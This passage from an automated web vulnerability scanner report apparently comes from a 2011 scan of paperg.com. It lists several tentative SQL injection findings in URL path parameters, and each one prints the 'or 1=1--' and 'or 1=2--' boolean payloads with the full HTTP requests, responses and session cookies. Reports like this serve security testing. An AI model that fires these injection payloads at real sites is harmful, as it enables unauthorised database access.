User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.18. http://www.paperg.com/flyerboard/nyprig/1753/45945.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/nyprig/1753/45945.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 94145908%20or%201%3d1--%20 and 94145908%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/nyprig/175394145908%20or%201%3d1--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3853
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NYPRIG - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "NYPRIG" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/20716/1050811nyp130512849245945.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END
...[SNIP]...

Request 2

GET /flyerboard/nyprig/175394145908%20or%201%3d2--%20/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.19. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/old-songs-festival/1552/45413.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77358718%20or%201%3d1--%20 and 77358718%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/old-songs-festival/155277358718%20or%201%3d1--%20/45413.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3961
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Old Songs Festival - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Old Songs Festival" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/6583/0oldsongsf130470440345413.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
...[SNIP]...

Request 2

GET /flyerboard/old-songs-festival/155277358718%20or%201%3d2--%20/45413.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.20. http://www.paperg.com/flyerboard/olsens/1552/42482.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/olsens/1552/42482.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20689799%20or%201%3d1--%20 and 20689799%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/olsens/155220689799%20or%201%3d1--%20/42482.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3856
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Olsen's - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Olsen's" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/19925/0olsens01130290108742482.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- EN
...[SNIP]...

Request 2

GET /flyerboard/olsens/155220689799%20or%201%3d2--%20/42482.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.21. http://www.paperg.com/flyerboard/pathways/1552/43051.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/pathways/1552/43051.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18914863%20or%201%3d1--%20 and 18914863%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/pathways/155218914863%20or%201%3d1--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3864
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Pathways - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Pathways" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0042211pat130391499343051.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!--
...[SNIP]...

Request 2

GET /flyerboard/pathways/155218914863%20or%201%3d2--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.22. http://www.paperg.com/flyerboard/pathways/1753/43051.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/pathways/1753/43051.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14406727%20or%201%3d1--%20 and 14406727%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/pathways/175314406727%20or%201%3d1--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3864
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Pathways - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Pathways" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4068/0042211pat130391499343051.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!--
...[SNIP]...

Request 2

GET /flyerboard/pathways/175314406727%20or%201%3d2--%20/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.23. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/residence-inn-by-marriott/1552/45964.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11463703%20or%201%3d1--%20 and 11463703%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/residence-inn-by-marriott/155211463703%20or%201%3d1--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3946
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Residence Inn By Marriott - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Residence Inn By Marriott" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7150/0residence130513260345964.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_log
...[SNIP]...

Request 2

GET /flyerboard/residence-inn-by-marriott/155211463703%20or%201%3d2--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.24. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/residence-inn-by-marriott/1753/45964.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16800562%20or%201%3d1--%20 and 16800562%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/residence-inn-by-marriott/175316800562%20or%201%3d1--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3946
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Residence Inn By Marriott - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Residence Inn By Marriott" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/7150/0residence130513260345964.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_log
...[SNIP]...

Request 2

GET /flyerboard/residence-inn-by-marriott/175316800562%20or%201%3d2--%20/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
